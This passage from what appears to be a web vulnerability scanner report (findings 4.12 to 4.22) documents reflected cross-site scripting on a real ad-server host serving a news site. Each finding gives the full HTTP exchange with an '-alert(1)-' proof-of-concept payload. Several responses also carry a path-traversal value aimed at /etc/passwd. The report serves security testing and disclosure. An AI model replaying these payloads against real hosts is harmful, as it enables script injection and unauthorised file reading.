GET /adj/q1.bosherald/be_newsac83b'-alert(1)-'4a7cc732c20;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/2118037356/Middle1/BostonHerald/quadrant1_newsROS300x250b_2010/quadrant1_newsROS300x250b_2010.html/4d686437616b35776e72734144666853?;ord=2118037356? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 455
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:47 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:47 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/be_newsac83b'-alert(1)-'4a7cc732c20;sz=300x250;net=q1;ord=2118037356?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
|
4.12. http://a.collective-media.net/adj/q1.bosherald/be_news [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/adj/q1.bosherald/be_news |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7fa92'-alert(1)-'ab795776af3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.bosherald/be_news;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/2118037356/Middle1/BostonHerald/quadrant1_newsROS300x250b_2010/quadrant1_newsROS300x250b_2010.html/4d686437616b35776e72734144666853?;ord=2118037356?&7fa92'-alert(1)-'ab795776af3=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 458
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:44 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:44 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/be_news;sz=300x250;net=q1;ord=2118037356?&7fa92'-alert(1)-'ab795776af3=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
|
4.13. http://a.collective-media.net/adj/q1.bosherald/be_news [sz parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/adj/q1.bosherald/be_news |
Issue detail
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5634a'-alert(1)-'72ece40b226 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.bosherald/be_news;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/2118037356/Middle1/BostonHerald/quadrant1_newsROS300x250b_2010/quadrant1_newsROS300x250b_2010.html/4d686437616b35776e72734144666853?;ord=2118037356?5634a'-alert(1)-'72ece40b226 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 455
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:43 GMT
Connection: close
Set-Cookie: dc=sea-dc7a1d176d1ddf45fe985559f7; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:43 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/be_news;sz=300x250;net=q1;ord=2118037356?5634a'-alert(1)-'72ece40b226;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
|
4.14. http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/adj/q1.bosherald/ent_fr |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a879'-alert(1)-'64a75099063 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.bosherald5a879'-alert(1)-'64a75099063/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1813138297/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/4d686437616b35776e72734144666853?;ord=1813138297? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 454
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:20:14 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:20:14 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald5a879'-alert(1)-'64a75099063/ent_fr;sz=300x250;net=q1;ord=1813138297?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
|
4.15. http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 3]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/adj/q1.bosherald/ent_fr |
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8840e'-alert(1)-'d174ab07fa0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.bosherald/ent_fr8840e'-alert(1)-'d174ab07fa0;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1813138297/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/4d686437616b35776e72734144666853?;ord=1813138297? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 454
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:20:20 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:20:20 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/ent_fr8840e'-alert(1)-'d174ab07fa0;sz=300x250;net=q1;ord=1813138297?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
|
4.16. http://a.collective-media.net/adj/q1.bosherald/ent_fr [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/adj/q1.bosherald/ent_fr |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2b65f'-alert(1)-'bf030976c6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1813138297/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/4d686437616b35776e72734144666853?;ord=1813138297?&2b65f'-alert(1)-'bf030976c6a=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 457
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:20:08 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:20:08 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/ent_fr;sz=300x250;net=q1;ord=1813138297?&2b65f'-alert(1)-'bf030976c6a=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
|
4.17. http://a.collective-media.net/adj/q1.bosherald/ent_fr [sz parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/adj/q1.bosherald/ent_fr |
Issue detail
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cedc7'-alert(1)-'a9dad4ab33d was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.bosherald/ent_fr;sz=300x250;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/track/home/L35/1813138297/Middle/BostonHerald/quadrant1_entHP300x250a_2010/quadrant1_edgeHP300x250a_0608.html/4d686437616b35776e72734144666853?;ord=1813138297?cedc7'-alert(1)-'a9dad4ab33d HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 454
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:20:01 GMT
Connection: close
Set-Cookie: dc=sea-dc7a1d176d2fd5b0e622cff9d7; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:20:01 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/ent_fr;sz=300x250;net=q1;ord=1813138297?cedc7'-alert(1)-'a9dad4ab33d;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
|
4.18. http://a.collective-media.net/adj/q1.bosherald/news [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/adj/q1.bosherald/news |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2596'-alert(1)-'065299ab6fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.bosheraldf2596'-alert(1)-'065299ab6fa/news;sz=728x90;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/354527464/Top/BostonHerald/quadrant1_newsROS728x90a_2010/quadrant1_newsROS728x90a_0608.html/4d686437616b35776e72734144666853?;ord=354527464? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:46 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:46 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosheraldf2596'-alert(1)-'065299ab6fa/news;sz=728x90;net=q1;ord=354527464?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
|
4.19. http://a.collective-media.net/adj/q1.bosherald/news [REST URL parameter 3]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/adj/q1.bosherald/news |
Issue detail
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3b4c'-alert(1)-'8f565e9fc2f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.bosherald/newsf3b4c'-alert(1)-'8f565e9fc2f;sz=728x90;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/354527464/Top/BostonHerald/quadrant1_newsROS728x90a_2010/quadrant1_newsROS728x90a_0608.html/4d686437616b35776e72734144666853?;ord=354527464? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:46 GMT
Connection: close
Set-Cookie: dc=sea-dc..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00sea-dc; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:46 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/newsf3b4c'-alert(1)-'8f565e9fc2f;sz=728x90;net=q1;ord=354527464?;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
|
4.20. http://a.collective-media.net/adj/q1.bosherald/news [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/adj/q1.bosherald/news |
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86cf3'-alert(1)-'c4fb3c8bde4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.bosherald/news;sz=728x90;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/354527464/Top/BostonHerald/quadrant1_newsROS728x90a_2010/quadrant1_newsROS728x90a_0608.html/4d686437616b35776e72734144666853?;ord=354527464?&86cf3'-alert(1)-'c4fb3c8bde4=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 453
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:44 GMT
Connection: close
Set-Cookie: dc=sea-dc%22; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:44 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/news;sz=728x90;net=q1;ord=354527464?&86cf3'-alert(1)-'c4fb3c8bde4=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
|
4.21. http://a.collective-media.net/adj/q1.bosherald/news [sz parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/adj/q1.bosherald/news |
Issue detail
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1595'-alert(1)-'d3ce0ff70fa was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/q1.bosherald/news;sz=728x90;click0=http://oascentral.bostonherald.com/RealMedia/ads/click_lx.ads/bh.heraldinteractive.com/news/home/L34/354527464/Top/BostonHerald/quadrant1_newsROS728x90a_2010/quadrant1_newsROS728x90a_0608.html/4d686437616b35776e72734144666853?;ord=354527464?c1595'-alert(1)-'d3ce0ff70fa HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fhome
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc
|
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 01:09:43 GMT
Connection: close
Set-Cookie: dc=sea-dc7a1d176d1ddf45fe985559f7; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 01:09:43 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/q1.bosherald/news;sz=728x90;net=q1;ord=354527464?c1595'-alert(1)-'d3ce0ff70fa;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
|
4.22. http://a.collective-media.net/cmadj/cm.rev_bostonherald/ [REST URL parameter 2]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://a.collective-media.net |
| Path: |
/cmadj/cm.rev_bostonherald/ |
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11b93'-alert(1)-'1cfbaccfaf5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
